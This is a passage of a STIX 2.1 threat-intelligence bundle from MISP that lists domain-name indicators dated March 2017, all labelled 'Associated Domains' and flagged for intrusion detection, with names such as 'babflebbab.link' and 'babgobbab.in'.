|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bfb-401c-4e80-b3e3-4561950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflebbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bfc-fdf8-4486-a4e1-4614950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflebbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bfd-ef48-4a70-970a-450e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflehbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bfe-c718-4ee5-8597-45af950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflibbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bff-10c0-45fb-b042-4b6d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflihbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bff-dbe0-48fb-966d-47a6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflohbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c00-cb00-4660-9606-4b07950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfluhbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c02-b860-4cf7-a158-4c65950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflulbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c03-9034-42b9-bc7a-4a1c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfobbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c04-5354-4f70-9056-4bfb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfohbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c04-9288-4930-92c8-4c99950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfolbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c05-3028-4773-9e27-4e19950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfrabbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c06-86d4-4ac7-a22a-40ea950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfrebbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c08-7288-4210-8d5e-4cb2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfrebbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c09-de6c-4338-a29e-45d9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfrehbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c09-f6e4-427d-bfb9-4d8b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfribbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c0a-5460-4b6b-9f67-4298950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfrihbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c0b-592c-4e20-ac57-45c5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfrohbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c0c-fc60-4a8b-adbf-430f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfrulbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c0d-bcac-44ee-bef1-4e06950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfulbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c0e-096c-4ca8-988b-4998950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgabbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c0e-32a0-411d-a2bb-40c4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgebbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c0f-bd3c-46a1-88bc-466a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgebbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c10-0534-4f30-acc6-48af950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgibbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c11-2648-448d-bf8e-4b3c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgihbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c12-a8e0-42a6-9c43-4911950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglabbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c13-9504-427b-8674-4f70950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglebbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c14-e6b4-48c9-81e2-414d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglebbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c15-0524-4395-a62c-46ae950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglehbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c15-2afc-48a2-9561-4457950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglibbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c16-a0f4-40be-90da-448e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglihbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c17-382c-4e71-a36b-4835950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglohbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c18-78d4-4b82-a88c-42df950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babglulbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c19-4240-4943-97b1-439e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgobbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c1a-6948-4d71-bc30-41e2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgofbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
